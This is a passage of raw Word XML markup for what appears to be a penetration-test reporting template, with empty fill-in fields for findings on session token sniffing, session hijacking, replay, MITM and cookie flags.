            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0BC7" w14:paraId="5595DA82" w14:textId="77777777" w:rsidTr="008A53F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4B7489C" w14:textId="72A32CE7" w:rsidR="008E0BC7" w:rsidRPr="009330EB" w:rsidRDefault="008E0BC7" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="008E0BC7">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Predictability of PRNG Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CA71B31" w14:textId="77777777" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidRPr="008E0BC7">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Yes/No, Source of Weakness if found</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="006C2D37" w14:textId="77777777" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53B39026" w14:textId="77777777" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46696D60" w14:textId="640ED728" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1F3F" w14:paraId="3BFEF4EF" w14:textId="77777777" w:rsidTr="008A53F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3710AD6" w14:textId="6980BDFE" w:rsidR="008D1F3F" w:rsidRPr="008E0BC7" w:rsidRDefault="008D1F3F" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="008D1F3F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Session Hijacking Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F72013E" w14:textId="77777777" w:rsidR="008D1F3F" w:rsidRDefault="008D1F3F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="00065BAE" w:rsidRPr="00065BAE">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Successful/Unsuccessful, Details of Exploit Path</w:t>
            </w:r>
            <w:r w:rsidR="00065BAE">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A61D1D" w14:textId="77777777" w:rsidR="00065BAE" w:rsidRDefault="00065BAE" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BE762B7" w14:textId="77777777" w:rsidR="00065BAE" w:rsidRDefault="00065BAE" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22B95BAE" w14:textId="173D6DA4" w:rsidR="00065BAE" w:rsidRDefault="00065BAE" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00083DD0" w14:paraId="3698FF95" w14:textId="77777777" w:rsidTr="008A53F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BCB23F6" w14:textId="3F65AE7E" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00065BAE" w:rsidP="008A53F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Other </w:t>
            </w:r>
            <w:r w:rsidR="00083DD0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Identified Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2F6391" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="72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40B8B4A" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="72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9EB7902" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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98E4DEB" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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3500484" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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FCA151D" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="0072512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83DD0" w14:paraId="4409FD84" w14:textId="77777777" w:rsidTr="008A53F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691CF52" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="008A53F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E4132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42CB4E9C" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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C939E00" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="73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6212BFC" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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1A12F0D" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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F96CAA7" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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6E96D12" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="0072512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0EBAB97B" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRPr="00A51A96" w:rsidRDefault="00204E6C" w:rsidP="00204E6C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4E6C" w14:paraId="096211D5" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C6A5297" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRDefault="00204E6C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05EF3976" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRDefault="00204E6C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="457C05BC" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRDefault="00204E6C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41F4DB08" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRDefault="00204E6C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6983A4A9" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRDefault="00204E6C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A50D0AA" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRDefault="00204E6C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73212E4D" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRDefault="00083DD0" w:rsidP="000947B4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48135B" w:rsidRPr="00A51A96" w14:paraId="50184648" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0E86452B" w14:textId="1CE88B3A" w:rsidR="0048135B" w:rsidRPr="003C713F" w:rsidRDefault="0048135B" w:rsidP="00725128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5.2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515AFE" w:rsidRPr="00515AFE">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Session Token Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F247F8A" w14:textId="77777777" w:rsidR="00204E6C" w:rsidRPr="00910370" w:rsidRDefault="00204E6C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2D1025" w:rsidRPr="002D1025" w14:paraId="353AF10E" w14:textId="77777777" w:rsidTr="0091037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95DC152" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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D102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CCE6665" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D102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D1025" w:rsidRPr="002D1025" w14:paraId="2D4C2B51" w14:textId="77777777" w:rsidTr="0091037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13E810D" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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D1025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5E996D4" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D102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D1025" w:rsidRPr="002D1025" w14:paraId="383E5B03" w14:textId="77777777" w:rsidTr="0091037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E269645" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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D102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95FB8BA" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D102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120EE" w:rsidRPr="002D1025" w14:paraId="239103EC" w14:textId="77777777" w:rsidTr="0091037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FE0C7A9" w14:textId="3A1F9331" w:rsidR="009120EE" w:rsidRPr="002D1025" w:rsidRDefault="009120EE" w:rsidP="0091037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Attack Performed?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32A496D" w14:textId="77777777" w:rsidR="009120EE" w:rsidRPr="00452054" w:rsidRDefault="00452054" w:rsidP="002D102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45205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[*Yes/No, Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7043927A" w14:textId="77777777" w:rsidR="00452054" w:rsidRDefault="00452054" w:rsidP="002D102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7CE64EA" w14:textId="77777777" w:rsidR="00452054" w:rsidRDefault="00452054" w:rsidP="002D102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D5867BF" w14:textId="750F1F2A" w:rsidR="00910370" w:rsidRPr="002D1025" w:rsidRDefault="00910370" w:rsidP="002D102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236B8" w:rsidRPr="002D1025" w14:paraId="0471491B" w14:textId="77777777" w:rsidTr="0091037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66128BB" w14:textId="3F18E6D0" w:rsidR="00F236B8" w:rsidRDefault="00F236B8" w:rsidP="0091037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Approach Followed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5F3ED78" w14:textId="77777777" w:rsidR="00F236B8" w:rsidRDefault="00F236B8" w:rsidP="002D102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8DE0A04" w14:textId="77777777" w:rsidR="00F236B8" w:rsidRDefault="00F236B8" w:rsidP="002D102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34372BF" w14:textId="77777777" w:rsidR="00F236B8" w:rsidRDefault="00F236B8" w:rsidP="002D102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8648C90" w14:textId="77777777" w:rsidR="00910370" w:rsidRPr="00452054" w:rsidRDefault="00910370" w:rsidP="002D102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D1025" w:rsidRPr="002D1025" w14:paraId="3C1FA771" w14:textId="77777777" w:rsidTr="0091037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B3658B5" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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D102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List of Session Cookies Collected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CE71AF6" w14:textId="77777777" w:rsidR="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D102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5608BFE" w14:textId="77777777" w:rsidR="00910370" w:rsidRDefault="00910370" w:rsidP="002D102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EF5F0B1" w14:textId="77777777" w:rsidR="00910370" w:rsidRPr="002D1025" w:rsidRDefault="00910370" w:rsidP="002D102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97A11" w:rsidRPr="002D1025" w14:paraId="22046998" w14:textId="77777777" w:rsidTr="0091037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72D6EA0" w14:textId="7EF48736" w:rsidR="00A97A11" w:rsidRPr="002D1025" w:rsidRDefault="00A97A11" w:rsidP="0091037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A97A11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Captured HTTP/HTTPS Traffic?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F173E99" w14:textId="77777777" w:rsidR="00A97A11" w:rsidRDefault="00D16912" w:rsidP="002D102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D1691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[*Yes/No, Details of Observed Session Cookies]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED949CC" w14:textId="77777777" w:rsidR="00D16912" w:rsidRDefault="00D16912" w:rsidP="002D102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4F9E64A" w14:textId="54B33561" w:rsidR="00D16912" w:rsidRPr="00D16912" w:rsidRDefault="00D16912" w:rsidP="002D102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D1025" w:rsidRPr="002D1025" w14:paraId="7395BC40" w14:textId="77777777" w:rsidTr="0091037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5677EAE" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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2D102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Secure Flag Set or Not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0E73B0E1" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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2D1025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07556F26" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025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2D1025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2D1025" w:rsidRPr="002D1025" w14:paraId="7547B9EC" w14:textId="77777777" w:rsidTr="0091037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263CCF9" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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2D102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Session Hijacking Performed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59BB51AF" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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2D1025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02398FA1" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025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2D1025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2D1025" w:rsidRPr="002D1025" w14:paraId="6EC02377" w14:textId="77777777" w:rsidTr="0091037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BB499E8" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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2D102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Session Replay Performed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3A813DE9" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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2D1025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0B30EB50" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025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2D1025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2D1025" w:rsidRPr="002D1025" w14:paraId="5AC14CAA" w14:textId="77777777" w:rsidTr="0091037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C1D9067" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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2D102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MITM ATTACK PERFORMED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7539A924" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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2D1025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401AAF3B" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025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2D1025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D16912" w:rsidRPr="002D1025" w14:paraId="2E43A598" w14:textId="77777777" w:rsidTr="0091037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76A6343" w14:textId="1DF5F0BF" w:rsidR="00D16912" w:rsidRPr="002D1025" w:rsidRDefault="00D16912" w:rsidP="0091037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D16912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Session Tokens Transmitted Over Insecure Channel?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09526BDF" w14:textId="77777777" w:rsidR="00D16912" w:rsidRPr="00F4393A" w:rsidRDefault="00D16912" w:rsidP="00D16912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F4393A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F4393A" w:rsidRPr="00F4393A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, HTTP Instead of HTTPS?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52FDF699" w14:textId="77777777" w:rsidR="00F4393A" w:rsidRDefault="00F4393A" w:rsidP="00D16912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  <w:p w14:paraId="7B11963A" w14:textId="77777777" w:rsidR="00F4393A" w:rsidRDefault="00F4393A" w:rsidP="00D16912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  <w:p w14:paraId="648A71FB" w14:textId="5A94FECB" w:rsidR="00F4393A" w:rsidRPr="002D1025" w:rsidRDefault="00F4393A" w:rsidP="00D16912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C8121F" w:rsidRPr="002D1025" w14:paraId="171F63F3" w14:textId="77777777" w:rsidTr="0091037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1CD151A" w14:textId="640BDFFF" w:rsidR="00C8121F" w:rsidRPr="00D16912" w:rsidRDefault="00C8121F" w:rsidP="0091037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C8121F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HttpOnly Flag on Cookies?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0CE98FB5" w14:textId="77777777" w:rsidR="00C8121F" w:rsidRDefault="00C8121F" w:rsidP="00D16912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A74199" w:rsidRPr="00A74199">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Risk of XSS-based Token Theft?</w:t>
            </w:r>
            <w:r w:rsidR="00A74199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2554F14A" w14:textId="77777777" w:rsidR="00A74199" w:rsidRDefault="00A74199" w:rsidP="00D16912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23AF4CBB" w14:textId="0AD84A94" w:rsidR="00A74199" w:rsidRPr="00F4393A" w:rsidRDefault="00A74199" w:rsidP="00D16912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F236B8" w:rsidRPr="002D1025" w14:paraId="1FAE6B05" w14:textId="77777777" w:rsidTr="0091037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61BB5A5" w14:textId="6215569B" w:rsidR="00F236B8" w:rsidRPr="002D1025" w:rsidRDefault="00F236B8" w:rsidP="0091037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>Evidence Collected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4AC588E0" w14:textId="3D78DEA4" w:rsidR="00F236B8" w:rsidRPr="00452054" w:rsidRDefault="00F236B8" w:rsidP="00F236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45205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If Any</w:t>
            </w:r>
            <w:r w:rsidRPr="0045205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8F1B30F" w14:textId="77777777" w:rsidR="00F236B8" w:rsidRDefault="00F236B8" w:rsidP="00F236B8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  <w:p w14:paraId="50F74B66" w14:textId="77777777" w:rsidR="00F236B8" w:rsidRDefault="00F236B8" w:rsidP="00F236B8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  <w:p w14:paraId="3CA84D68" w14:textId="77777777" w:rsidR="00F236B8" w:rsidRPr="002D1025" w:rsidRDefault="00F236B8" w:rsidP="00F236B8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2D1025" w:rsidRPr="002D1025" w14:paraId="722C4DCD" w14:textId="77777777" w:rsidTr="0091037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4A6F49E" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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2D102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Test results for Session Token Sniffing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4032997" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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85F57AE" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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CB36F2D" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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ABCD755" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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99DA462" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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FB8088A" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D102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D1025" w:rsidRPr="002D1025" w14:paraId="5FB87485" w14:textId="77777777" w:rsidTr="0091037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8B1B01A" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="0091037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D1025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3BDAE63" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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ED7D6BE" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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9561B81" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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769ED98" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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5CCAFDE" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D1025">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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883B4B6" w14:textId="77777777" w:rsidR="002D1025" w:rsidRPr="002D1025" w:rsidRDefault="002D1025" w:rsidP="002D102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65A84806" w14:textId="77777777" w:rsidR="0078503C" w:rsidRPr="00A51A96" w:rsidRDefault="0078503C" w:rsidP="0078503C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503C" w14:paraId="00ACC0BC" w14:textId="77777777" w:rsidTr="005A42F1">
        <w:trPr>
          <w:trHeight w:val="5768"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03DFF79C" w14:textId="77777777" w:rsidR="0078503C" w:rsidRDefault="0078503C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="422ABE97" w14:textId="77777777" w:rsidR="0078503C" w:rsidRDefault="0078503C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CDE730E" w14:textId="77777777" w:rsidR="0078503C" w:rsidRDefault="0078503C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CF0D5DF" w14:textId="77777777" w:rsidR="0078503C" w:rsidRDefault="0078503C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E49BA88" w14:textId="77777777" w:rsidR="0078503C" w:rsidRDefault="0078503C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D85CA40" w14:textId="77777777" w:rsidR="0078503C" w:rsidRDefault="0078503C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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C9204F" w:rsidRPr="00A51A96" w14:paraId="717BC450" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
